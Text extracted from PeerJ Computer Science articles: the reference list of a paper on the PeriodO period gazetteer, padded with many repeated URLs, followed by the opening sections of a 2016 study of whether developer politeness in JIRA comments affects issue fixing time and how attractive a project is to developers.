http://www.w3.org/TR/2006/WD-owl-time-20060927/ http://www.w3.org/TR/2006/WD-owl-time-20060927/ http://www.w3.org/TR/2006/WD-owl-time-20060927/ http://www.w3.org/TR/2006/WD-owl-time-20060927/ http://www.w3.org/TR/2006/WD-owl-time-20060927/ http://www.w3.org/TR/2006/WD-owl-time-20060927/ http://www.w3.org/TR/2006/WD-owl-time-20060927/ http://www.w3.org/TR/2006/WD-owl-time-20060927/ http://www.w3.org/TR/2006/WD-owl-time-20060927/ http://www.w3.org/TR/2006/WD-owl-time-20060927/ http://www.w3.org/TR/2006/WD-owl-time-20060927/ http://www.w3.org/TR/2006/WD-owl-time-20060927/ http://www.w3.org/TR/2006/WD-owl-time-20060927/ http://www.w3.org/TR/2006/WD-owl-time-20060927/ http://www.w3.org/TR/2006/WD-owl-time-20060927/ http://www.w3.org/TR/2006/WD-owl-time-20060927/ http://www.w3.org/TR/2006/WD-owl-time-20060927/ http://www.w3.org/TR/2006/WD-owl-time-20060927/ http://www.w3.org/TR/2006/WD-owl-time-20060927/ http://www.w3.org/TR/2006/WD-owl-time-20060927/ http://www.w3.org/TR/2006/WD-owl-time-20060927/ http://www.w3.org/TR/2006/WD-owl-time-20060927/ http://www.w3.org/TR/2006/WD-owl-time-20060927/ http://www.w3.org/TR/2006/WD-owl-time-20060927/ http://www.w3.org/TR/2006/WD-owl-time-20060927/ http://dx.doi.org/10.7717/peerj-cs.44 Isaksen L, Simon R, Barker ET, De Soto Cañamares P. 2014. Pelagios and the emerging graph of ancient world data. In: Proceedings of the 2014 ACM conference on Web science—WebSci ’14. New York: ACM Press, 197–201. Kauppinen T, Mantegari G, Paakkarinen P, Kuittinen H, Hyvönen E, Bandini S. 2010. Determining relevance of imprecise temporal intervals for cultural heritage information retrieval. International Journal of Human-Computer Studies 68(9):549–560 DOI 10.1016/j.ijhcs.2010.03.002. Kuhn T. 2015. Science bots: a model for the future of scientific computation? In: WWW 2015 companion proceedings. New York: ACM. Kuhn T, Barbano PE, Nagy ML, Krauthammer M. 2013. Broadening the scope of nanopublications. In: The semantic web: semantics and big data. Vol. 7882. Heidelberg: Springer, 487–501. McGuinness D, Lebo T, Sahoo S. 2013. PROV-O: the PROV ontology. W3C recommendation, W3C. Available at http://www.w3.org/TR/2013/REC-prov-o-20130430/. Mink LO. 1966. The autonomy of historical understanding. History and Theory 5(1):24–47 DOI 10.2307/2504434. Mons B, Van Haagen H, Chichester C, Hoen P-BT, Den Dunnen JT, Van Ommen G, Van Mulligen E, Singh B, Hooft R, Roos M, Hammond J, Kiesel B, Giardine B, Velterop J, Groth P, Schultes E. 2011. The value of data. Nature Genetics 43(4):281–283 DOI 10.1038/ng0411-281. Mons B, Velterop J. 2009. Nano-publication in the e-science era. In: Clark T, Luciano JS, Marshall MS, Prud’hommeaux E, Stephens S, eds. Proceedings of the workshop on semantic web applications in scientific discourse (SWASD 2009), CEUR workshop proceedings. Washington, D.C. Available at http://ceur-ws.org/Vol-523/Mons.pdf. Nelson TH. 1999. Xanalogical structure, needed now more than ever: parallel documents, deep links to content, deep versioning, and deep re-use. ACM Computing Surveys 31(4es):33–es DOI 10.1145/345966.346033. Nottingham M, Bryan P. 2013. Java script object notation (JSON) patch. In: IETF proposed standard, internet engineering task force (IETF). Available at https://tools.ietf.org/html/rfc6902. Rabinowitz A. 2014. It’s about time: historical periodization and linked ancient world data. ISAW Papers 7:22. Available at http://dlib.nyu.edu/awdl/isaw/isaw-papers/7/rabinowitz/. Shaw R, Rabinowitz A, Golden P, Kansa E. 2015. A sharing-oriented design strategy for networked knowledge organization systems. International Journal on Digital Libraries Epub ahead of print Aug 14 2015 DOI 10.1007/s00799-015-0164-0. Sporny M, Kellogg G, Lanthaler M. 2014. JSON-LD 1.0. W3C recommendation, W3C. Available at http://www.w3.org/TR/2014/REC-json-ld-20140116/. Starr J, Willett P, Federer L, Horning C, Bergstrom M. 2012. A collaborative framework for data management services: the experience of the university of California. Journal of eScience Librarianship 1(2):109–114 DOI 10.7191/jeslib.2012.1014. Golden and Shaw (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.44 18/18 https://peerj.com/computer-science/ http://dx.doi.org/10.1016/j.ijhcs.2010.03.002 http://www.w3.org/TR/2013/REC-prov-o-20130430/ http://www.w3.org/TR/2013/REC-prov-o-20130430/ http://www.w3.org/TR/2013/REC-prov-o-20130430/ http://www.w3.org/TR/2013/REC-prov-o-20130430/ http://www.w3.org/TR/2013/REC-prov-o-20130430/ http://www.w3.org/TR/2013/REC-prov-o-20130430/ http://www.w3.org/TR/2013/REC-prov-o-20130430/ http://www.w3.org/TR/2013/REC-prov-o-20130430/ http://www.w3.org/TR/2013/REC-prov-o-20130430/ http://www.w3.org/TR/2013/REC-prov-o-20130430/ http://www.w3.org/TR/2013/REC-prov-o-20130430/ http://www.w3.org/TR/2013/REC-prov-o-20130430/ http://www.w3.org/TR/2013/REC-prov-o-20130430/ http://www.w3.org/TR/2013/REC-prov-o-20130430/ http://www.w3.org/TR/2013/REC-prov-o-20130430/ http://www.w3.org/TR/2013/REC-prov-o-20130430/ http://www.w3.org/TR/2013/REC-prov-o-20130430/ http://www.w3.org/TR/2013/REC-prov-o-20130430/ http://www.w3.org/TR/2013/REC-prov-o-20130430/ http://www.w3.org/TR/2013/REC-prov-o-20130430/ http://www.w3.org/TR/2013/REC-prov-o-20130430/ http://www.w3.org/TR/2013/REC-prov-o-20130430/ http://www.w3.org/TR/2013/REC-prov-o-20130430/ http://www.w3.org/TR/2013/REC-prov-o-20130430/ http://www.w3.org/TR/2013/REC-prov-o-20130430/ http://www.w3.org/TR/2013/REC-prov-o-20130430/ http://www.w3.org/TR/2013/REC-prov-o-20130430/ http://www.w3.org/TR/2013/REC-prov-o-20130430/ http://www.w3.org/TR/2013/REC-prov-o-20130430/ http://www.w3.org/TR/2013/REC-prov-o-20130430/ http://www.w3.org/TR/2013/REC-prov-o-20130430/ http://www.w3.org/TR/2013/REC-prov-o-20130430/ http://www.w3.org/TR/2013/REC-prov-o-20130430/ http://www.w3.org/TR/2013/REC-prov-o-20130430/ http://www.w3.org/TR/2013/REC-prov-o-20130430/ http://www.w3.org/TR/2013/REC-prov-o-20130430/ http://www.w3.org/TR/2013/REC-prov-o-20130430/ http://www.w3.org/TR/2013/REC-prov-o-20130430/ http://www.w3.org/TR/2013/REC-prov-o-20130430/ http://www.w3.org/TR/2013/REC-prov-o-20130430/ http://www.w3.org/TR/2013/REC-prov-o-20130430/ http://www.w3.org/TR/2013/REC-prov-o-20130430/ http://www.w3.org/TR/2013/REC-prov-o-20130430/ http://www.w3.org/TR/2013/REC-prov-o-20130430/ http://www.w3.org/TR/2013/REC-prov-o-20130430/ http://www.w3.org/TR/2013/REC-prov-o-20130430/ http://dx.doi.org/10.2307/2504434 http://dx.doi.org/10.1038/ng0411-281 http://ceur-ws.org/Vol-523/Mons.pdf http://ceur-ws.org/Vol-523/Mons.pdf http://ceur-ws.org/Vol-523/Mons.pdf http://ceur-ws.org/Vol-523/Mons.pdf http://ceur-ws.org/Vol-523/Mons.pdf http://ceur-ws.org/Vol-523/Mons.pdf http://ceur-ws.org/Vol-523/Mons.pdf http://ceur-ws.org/Vol-523/Mons.pdf http://ceur-ws.org/Vol-523/Mons.pdf http://ceur-ws.org/Vol-523/Mons.pdf http://ceur-ws.org/Vol-523/Mons.pdf http://ceur-ws.org/Vol-523/Mons.pdf http://ceur-ws.org/Vol-523/Mons.pdf http://ceur-ws.org/Vol-523/Mons.pdf http://ceur-ws.org/Vol-523/Mons.pdf http://ceur-ws.org/Vol-523/Mons.pdf http://ceur-ws.org/Vol-523/Mons.pdf http://ceur-ws.org/Vol-523/Mons.pdf http://ceur-ws.org/Vol-523/Mons.pdf http://ceur-ws.org/Vol-523/Mons.pdf http://ceur-ws.org/Vol-523/Mons.pdf http://ceur-ws.org/Vol-523/Mons.pdf http://ceur-ws.org/Vol-523/Mons.pdf http://ceur-ws.org/Vol-523/Mons.pdf http://ceur-ws.org/Vol-523/Mons.pdf http://ceur-ws.org/Vol-523/Mons.pdf http://ceur-ws.org/Vol-523/Mons.pdf http://ceur-ws.org/Vol-523/Mons.pdf http://ceur-ws.org/Vol-523/Mons.pdf http://ceur-ws.org/Vol-523/Mons.pdf http://ceur-ws.org/Vol-523/Mons.pdf http://ceur-ws.org/Vol-523/Mons.pdf http://ceur-ws.org/Vol-523/Mons.pdf http://ceur-ws.org/Vol-523/Mons.pdf http://ceur-ws.org/Vol-523/Mons.pdf http://dx.doi.org/10.1145/345966.346033 https://tools.ietf.org/html/rfc6902 https://tools.ietf.org/html/rfc6902 https://tools.ietf.org/html/rfc6902 https://tools.ietf.org/html/rfc6902 https://tools.ietf.org/html/rfc6902 https://tools.ietf.org/html/rfc6902 https://tools.ietf.org/html/rfc6902 https://tools.ietf.org/html/rfc6902 https://tools.ietf.org/html/rfc6902 https://tools.ietf.org/html/rfc6902 https://tools.ietf.org/html/rfc6902 https://tools.ietf.org/html/rfc6902 https://tools.ietf.org/html/rfc6902 https://tools.ietf.org/html/rfc6902 https://tools.ietf.org/html/rfc6902 https://tools.ietf.org/html/rfc6902 https://tools.ietf.org/html/rfc6902 https://tools.ietf.org/html/rfc6902 https://tools.ietf.org/html/rfc6902 https://tools.ietf.org/html/rfc6902 https://tools.ietf.org/html/rfc6902 https://tools.ietf.org/html/rfc6902 https://tools.ietf.org/html/rfc6902 https://tools.ietf.org/html/rfc6902 https://tools.ietf.org/html/rfc6902 https://tools.ietf.org/html/rfc6902 https://tools.ietf.org/html/rfc6902 https://tools.ietf.org/html/rfc6902 https://tools.ietf.org/html/rfc6902 https://tools.ietf.org/html/rfc6902 https://tools.ietf.org/html/rfc6902 https://tools.ietf.org/html/rfc6902 https://tools.ietf.org/html/rfc6902 https://tools.ietf.org/html/rfc6902 https://tools.ietf.org/html/rfc6902 http://dlib.nyu.edu/awdl/isaw/isaw-papers/7/rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/7/rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/7/rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/7/rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/7/rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/7/rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/7/rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/7/rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/7/rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/7/rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/7/rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/7/rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/7/rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/7/rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/7/rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/7/rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/7/rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/7/rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/7/rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/7/rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/7/rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/7/rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/7/rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/7/rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/7/rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/7/rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/7/rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/7/rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/7/rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/7/rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/7/rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/7/rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/7/rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/7/rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/7/rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/7/rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/7/rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/7/rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/7/rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/7/rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/7/rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/7/rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/7/rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/7/rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/7/rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/7/rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/7/rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/7/rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/7/rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/7/rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/7/rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/7/rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/7/rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/7/rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/7/rabinowitz/ http://dx.doi.org/10.1007/s00799-015-0164-0 http://www.w3.org/TR/2014/REC-json-ld-20140116/ http://www.w3.org/TR/2014/REC-json-ld-20140116/ http://www.w3.org/TR/2014/REC-json-ld-20140116/ http://www.w3.org/TR/2014/REC-json-ld-20140116/ http://www.w3.org/TR/2014/REC-json-ld-20140116/ http://www.w3.org/TR/2014/REC-json-ld-20140116/ http://www.w3.org/TR/2014/REC-json-ld-20140116/ http://www.w3.org/TR/2014/REC-json-ld-20140116/ http://www.w3.org/TR/2014/REC-json-ld-20140116/ http://www.w3.org/TR/2014/REC-json-ld-20140116/ http://www.w3.org/TR/2014/REC-json-ld-20140116/ http://www.w3.org/TR/2014/REC-json-ld-20140116/ http://www.w3.org/TR/2014/REC-json-ld-20140116/ http://www.w3.org/TR/2014/REC-json-ld-20140116/ http://www.w3.org/TR/2014/REC-json-ld-20140116/ http://www.w3.org/TR/2014/REC-json-ld-20140116/ http://www.w3.org/TR/2014/REC-json-ld-20140116/ http://www.w3.org/TR/2014/REC-json-ld-20140116/ http://www.w3.org/TR/2014/REC-json-ld-20140116/ http://www.w3.org/TR/2014/REC-json-ld-20140116/ http://www.w3.org/TR/2014/REC-json-ld-20140116/ http://www.w3.org/TR/2014/REC-json-ld-20140116/ http://www.w3.org/TR/2014/REC-json-ld-20140116/ http://www.w3.org/TR/2014/REC-json-ld-20140116/ http://www.w3.org/TR/2014/REC-json-ld-20140116/ http://www.w3.org/TR/2014/REC-json-ld-20140116/ http://www.w3.org/TR/2014/REC-json-ld-20140116/ http://www.w3.org/TR/2014/REC-json-ld-20140116/ http://www.w3.org/TR/2014/REC-json-ld-20140116/ http://www.w3.org/TR/2014/REC-json-ld-20140116/ http://www.w3.org/TR/2014/REC-json-ld-20140116/ http://www.w3.org/TR/2014/REC-json-ld-20140116/ http://www.w3.org/TR/2014/REC-json-ld-20140116/ http://www.w3.org/TR/2014/REC-json-ld-20140116/ http://www.w3.org/TR/2014/REC-json-ld-20140116/ http://www.w3.org/TR/2014/REC-json-ld-20140116/ http://www.w3.org/TR/2014/REC-json-ld-20140116/ http://www.w3.org/TR/2014/REC-json-ld-20140116/ http://www.w3.org/TR/2014/REC-json-ld-20140116/ http://www.w3.org/TR/2014/REC-json-ld-20140116/ http://www.w3.org/TR/2014/REC-json-ld-20140116/ http://www.w3.org/TR/2014/REC-json-ld-20140116/ http://www.w3.org/TR/2014/REC-json-ld-20140116/ http://www.w3.org/TR/2014/REC-json-ld-20140116/ http://www.w3.org/TR/2014/REC-json-ld-20140116/ http://www.w3.org/TR/2014/REC-json-ld-20140116/ http://www.w3.org/TR/2014/REC-json-ld-20140116/ http://dx.doi.org/10.7191/jeslib.2012.1014 http://dx.doi.org/10.7717/peerj-cs.44 Nanopublication beyond the sciences: the PeriodO period gazetteer Introduction Nanopublications Nanopublication in the Humanities The PeriodO Period Gazetteer Data model PeriodO as Linked Data RDF vocabularies Modeling provenance Minting long-term URLs Period Assertions as Nanopublications The unfalsifiable nature of time period definitions The critical role of curation Project Status and Future Work Conclusion References work_h35ppmoemvbgdnrofwufellqvq ---- Submitted 17 November 2015 Accepted 15 June 2016 Published 18 July 2016 Corresponding author Giuseppe Destefanis, giuseppe.destefanis@brunel.ac.uk Academic editor Arie van Deursen Additional Information and Declarations can be found on page 29 DOI 10.7717/peerj-cs.73 Copyright 2016 Destefanis et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Software development: do good manners matter? Giuseppe Destefanis1, Marco Ortu2, Steve Counsell1, Stephen Swift1, Michele Marchesi2 and Roberto Tonelli2 1 Department of Computer Science, Brunel University, London, United Kingdom 2 Department of Electrical and Electronic Engineering, University of Cagliari, Cagliari, Italy ABSTRACT A successful software project is the result of a complex process involving, above all, people. Developers are the key factors for the success of a software development process, not merely as executors of tasks, but as protagonists and core of the whole development process. This paper investigates social aspects among developers working on software projects developed with the support of Agile tools. We studied 22 open- source software projects developed using the Agile board of the JIRA repository. All comments committed by developers involved in the projects were analyzed and we explored whether the politeness of comments affected the number of developers involved and the time required to fix any given issue. Our results showed that the level of politeness in the communication process among developers does have an effect on the time required to fix issues and, in the majority of the analysed projects, it had a positive correlation with attractiveness of the project to both active and potential developers. The more polite developers were, the less time it took to fix an issue. Subjects Data Mining and Machine Learning, Data Science, Software Engineering Keywords Social and human aspects, Politeness, Mining software repositories, Issue fixing time, Software development INTRODUCTION High-level software development is a complex activity involving a range of people and activities; ignoring human aspects in the software development process or managing them in an inappropriate way can, potentially, have a huge impact on the software production process and team effectiveness. Increasingly, researchers have tried to quantify and measure how social aspects affect software development. Bill Curtis claimed that ‘‘the creation of a large software system must be analyzed as a behavioural process’’ (Curtis, Krasner & Iscoe, 1988). Coordinating and structuring a development team is thus a vital activity for software companies and team dynamics have a direct influence on group successfulness. Open-source development usually involves developers that voluntarily participate in a project by contributing with code-development. In many senses, the management of such developers is more complex than the management of a team within a company: developers are not in the same place at the same time and coordination therefore becomes more difficult. Additionally, the absence of face-to-face communication mandates the use of alternative technologies such as mailing lists, electronic boards or issue tracking systems. In this context, being rude or aggressive when writing a comment or replying to a contributor can affect the cohesion of the group, its membership and the successfulness of a project. How to cite this article Destefanis et al. (2016), Software development: do good manners matter? PeerJ Comput. Sci. 2:e73; DOI 10.7717/peerj-cs.73 https://peerj.com mailto:giuseppe.destefanis@brunel.ac.uk https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.73 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://dx.doi.org/10.7717/peerj-cs.73 On the other hand, a respectful environment provides an incentive for new contributors to join the project and could significantly extend the lifetime and usefulness of a project to the community. According to VersionOne (https://www.versionone.com/pdf/2013-state-of-agile- survey.pdf) (VersionOne, 2013): ‘‘more people are recognising that agile development is beneficial to business, with an 11% increase over the last two years in the number of people who claim that agile helps organisations complete projects faster’’. A main priority reported by users was to accelerate time to market, manage changing priorities more easily and better align IT and business objectives. Agile project management tools and Kanban boards experienced the largest growth in popularity of all agile tool categories, with use or planned use increasing by 6%. One of the top five ranked tools was Atlassian JIRA (https://www.atlassian.com/software/jira), with an 87% recommendation rate. Agile boards represent the central aspect of communication in the Agile philosophy. According to Perry (2008) ‘‘the task board is one of the most important radiators used by an agile team to track their progress.’’ The JIRA board is a good solution for bridging the gap between open-source software development and the Agile world. It is the view of many that agile development requires a physical aspect, i.e., developers working together in the same room or building, or at the same desk; the pair programming paradigm, for example, requires at least two people working simultaneously on the same piece of code. By using tools such as the JIRA board (Fig. 1) it is possible to use an agile board for development of a project by developers in different physical places. Working remotely, in different time zones and with different time schedules, with developers from around the world, requires coordination and communication. The JIRA board displays issues from one or more projects, giving the possibility of viewing, managing and reporting on work in progress. It is possible to use a board that someone else has created, or create as many boards as needed. When a new developer joins a development team, the better the communication process works, the faster the new developer can become productive and the learning curve reduced. The notion of an agile board therefore places emphasis on the know-how and shared-knowledge of a project being easily accessible for the development team throughout the development process. Fast releases, continuous integration and testing activities are directly connected to the knowledge of the system under development. The potential for agile boards to simplify development across geographically disparate areas is in this sense relatively clear. In a similar vein, the social and human aspects of the development process are becoming more and more important. The Google work style has become a model for many software start-ups: a pleasant work environment is important and affects the productivity of employees. One important contributor to a healthy work environment is that each employee is considerate and polite towards their fellow employees. Collins dictionary (http: //www.collinsdictionary.com/dictionary/english/polite) defines politeness as ‘‘showing regard for others, in manners, speech, behaviour, etc.’’ We focus on the politeness of the comment-messages written by the developers. The research aims to show how project management tools such as agile boards can directly affect the productivity of a software development team and the health of a software project. Destefanis et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.73 2/35 https://peerj.com https://www.versionone.com/pdf/2013-state-of-agile-survey.pdf https://www.versionone.com/pdf/2013-state-of-agile-survey.pdf https://www.atlassian.com/software/jira http://www.collinsdictionary.com/dictionary/english/polite http://www.collinsdictionary.com/dictionary/english/polite http://dx.doi.org/10.7717/peerj-cs.73 Figure 1 Example of JIRA board with issues. The state of the art tool developed by Danescu-Niculescu-Mizil et al. (2013) was used to evaluate politeness within comment-messages. The authors proposed a machine learning approach for evaluating the politeness of a request posted in two different web applications: Wikipedia (https://en.wikipedia.org/wiki/Main_Page) and Stack Overflow (http://stackoverflow.com). Stack Overflow is well known in the software engineering field and is largely used by software practitioners; hence, the model that authors used in Danescu-Niculescu-Mizil et al. (2013) was suitable for our domain based on Jira issues, where developers post and discuss about technical aspects of issues. The authors provide a Web application (http://www.mpi-sws.org/~cristian/Politeness.html) and a library version of their tool. To prepare the training set for the machine learning approach, over 10,000 utterances were labeled using Amazon Mechanical Turk. The authors decided to restrict the residence of the annotators to the US and conducted a linguistic background questionnaire. Since ‘‘politeness is a culturally defined phenomenon and what is considered polite in one culture can sometimes be quite rude or simply eccentric in another cultural context’’ (http://en.wikipedia.org/wiki/Politeness), the choice of limiting the residence of the annotators to the US could be interpreted as a weakness of the the tool. However, the annotators analysed comments written by authors from around the world and not only Destefanis et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.73 3/35 https://peerj.com https://en.wikipedia.org/wiki/Main_Page http://stackoverflow.com http://www.mpi-sws.org/~cristian/Politeness.html http://en.wikipedia.org/wiki/Politeness http://dx.doi.org/10.7717/peerj-cs.73 from the US. Therefore, the possible bias introduced by annotators with a similar cultural background, is reduced and the different cultures of the developers involved in the analysis considered. The use of the tool would have been problematic, if annotators were from the US and they had analysed only comments written by authors from the US. We considered 22 open source projects from one of the largest datasets of issues reports openly available (Ortu et al., 2015d). This paper aims to answer the following research questions: • Does a relationship exist between politeness and issues fixing time? Issue fixing time for polite issues is shorter than issue fixing time for impolite and mixed issues. • Does politeness among developers affect the attractiveness of a project? Magnetism and Stickiness are positively correlated with the percentage of polite comments. • Does the percentage of polite comments vary over time? The percentage of polite comments does vary over time and in some cases it changes from lower percentage of polite comments to higher percentage of polite comments from two consecutive observation intervals. The percentage of polite comments over time is (for the majority of the projects in our corpus) seasonal and not random. • How does politeness vary with respect to JIRA maintenance types and issue priorities? Comments related to issues with maintenance Bug, priority Minor and Trivial, tend to have a higher percentage of impolite comments. Issues with maintenance New Feature, priority Blocker and Critical tend to have a higher percentage of polite comments. This paper is an extended version of earlier work by the same authors (Ortu et al., 2015b). We added eight new systems to the original corpus analysed in (Ortu et al., 2015b) and two new research question (RQ3 and RQ4), we also reviewed the RQ2 performing deeper statistical analysis. The remainder of this paper is structured as follows: In the next section, we provide related work. ‘Experimental Setup’ describes the dataset used for this study and our approach/rationale to evaluate the politeness of comments posted by developers. In ‘Results,’ we present the results and elaborate on the research questions we address. In ‘Discussion’ we present a discussion on the obtained results and ‘Threats to Validity’ discusses the threats to validity. Finally, we summarise the study findings and present plans for future work in ‘Conclusions and Future Work.’ RELATED WORK A growing body of literature has investigated the importance and the influence of human and social aspects, emotions and mood both in software engineering and software development. Research has focused on understanding how the human aspects of a technical discipline can affect final results (Brief & Weiss, 2002; Capretz, 2003; Cockburn & Highsmith, 2001; Erez & Isen, 2002; Kaluzniacky, 2004), and the effect of politeness (Novielli, Calefato & Lanubile, 2014; Tan & Howard-Jones, 2014; Winschiers & Paterson, 2004; Tsay, Dabbish & Herbsleb, 2014; Rousinopoulos, Robles & González-Barahona, 2014). Destefanis et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.73 4/35 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.73 Feldt et al. (2008) focused on personality as a relevant psychometric factor and presented results from an empirical study about correlations between personality and attitudes to software engineering processes and tools. The authors found that higher levels of the personality dimension ‘‘conscientiousness’’ correlated with attitudes towards work style, openness to changes and task preference. IT companies are also becaming more conscious of social aspects. Ehlers (2015) evaluated the efforts of IT companies in acquiring software engineers by emphasizing socialness in their job advertising. The research analyzed 75,000 jobs advertising from the recruiting platform Indeed and about 2,800 job ads from StackoverflowCareers to investigate correlations between social factors and the employee satisfaction of a work place. The findings showed that many companies advertise socialness explicitly. The Manifesto for Agile Development indicates that people and communications are more essential than procedures and tools (Beck et al., 2001). Studies have also investigated the relationship between affect and work-related achievements, including performance (Miner & Glomb, 2010) and problem-solving processes, such as creativity, (Amabile et al., 2005). Furthermore, strong evidence for emotional contagion on all its possible polarities has been found in a recent very large scale study (Kramer, Guillory & Hancock, 2014). Therefore, affect is an interesting avenue for research in software engineering. Steinmacher et al. (2015) analyzed social barriers that obstructed first contributions of newcomers (new developers joining an open-source project). The study indicated how impolite answers were considered as a barrier by newcomers. These barriers were identified through a systematic literature review, responses collected from open source project contributors and students contributing to open source projects. Roberts, Hann & Slaughter (2006) conducted a study which revealed how the different motivations of open-source developers were interrelated, how these motivations influenced participation and how past performance influenced subsequent motivations. Guzman & Bruegge (2013) and Guzman (2013a) have proposed prototypes and initial descriptive studies towards the visualization of affect over a software development process. In their work, the authors applied sentiment analysis to data coming from mailing lists, web pages, and other text-based documents of software projects. Guzman et al. built a prototype to display a visualization of the affect of a development team, and they interviewed project members to validate the usefulness of their approach. In another study, Guzman, Azócar & Li (2014), performed sentiment analysis of Github’s commit comments to investigate how emotions were related to a project’s programming language, the commits’ day of the week and time, and the approval of the projects. The analysis was performed over 29 top-starred Github repositories implemented in 14 different programming languages. The results showed Java to be the programming language most associated with negative affect. No correlation was found between the number of Github stars and the affect of the commit messages. Panichella et al. (2015) presented a taxonomy to classify app reviews into categories relevant to software maintenance and evolution, as well as an approach that merges three techniques (Natural Language Processing, Text Analysis, Sentiment Analysis) to Destefanis et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.73 5/35 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.73 automatically classify app reviews into the proposed categories. The authors showed that the combined use of these techniques achieves better results (a precision of 75% and a recall of 74%) than results obtained using each technique individually (precision of 70% and a recall of 67%). Pletea, Vasilescu & Serebrenik (2014) studied security-related discussions on GitHub, as mined from discussions around commits and pull requests. The authors found that security-related discussions account for approximately 10% of all discussions on GitHub and that more negative emotions were expressed in security-related discussions than in other discussions. These findings confirmed the importance of properly training developers to address security concerns in their applications as well as the need to test applications thoroughly for security vulnerabilities in order to reduce frustration and improve overall project atmosphere. Garcia, Zanetti & Schweitzer (2013) analyzed the relation between the emotions and the activity of contributors in the Open Source Software project Gentoo. The case study built on extensive data sets from the project’s bug tracking platform Bugzilla, to quantify the activity of contributors, and its mail archives, to quantify the emotions of contributors by means of sentiment analysis. The Gentoo project is known for a period of centralization within its bug triaging community. This was followed by considerable changes in community organization and performance after the sudden retirement of the central contributor. The authors analyzed how this event correlated with the negative emotions, both in bilateral email discussions with the central contributor, and at the level of the whole community of contributors. The authors also extended the study to consider the activity patterns of Gentoo contributors in general. They found that contributors were more likely to become inactive when they expressed strong positive or negative emotions in the bug tracker, or when they deviated from the expected value of emotions in the mailing list. The authors used these insights to develop a Bayesian classifier which detected the risk of contributors leaving the project. Graziotin, Wang & Abrahamsson (2015) conducted a qualitative interpretive study based on face-to-face open-ended interviews, in-field observations and e-mail exchanges. This enabled the authors to construct a novel explanatory theory of the impact of affects on development performance. The theory was explicated using an established taxonomy framework. The proposed theory built upon the concepts of events, affects, attractors, focus, goals, and performance. In other work Graziotin, Wang & Abrahamsson (2014) reported the results of an investigation with 42 participants about the relationship between the affective states, creativity, and analytical problem-solving skills of software developers. The results offered support for the claim that happy developers were better problem solvers in terms of their analytical abilities. The authors provided a better understanding of the impact of affective states on the creativity and analytical problem-solving capacities of developers, introduced and validated psychological measurements, theories, and concepts of affective states, creativity, and analytical-problem-solving skills in empirical software engineering, and raised the need for studying the human factors of software engineering by employing a multi-disciplinary viewpoint. Destefanis et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.73 6/35 https://peerj.com 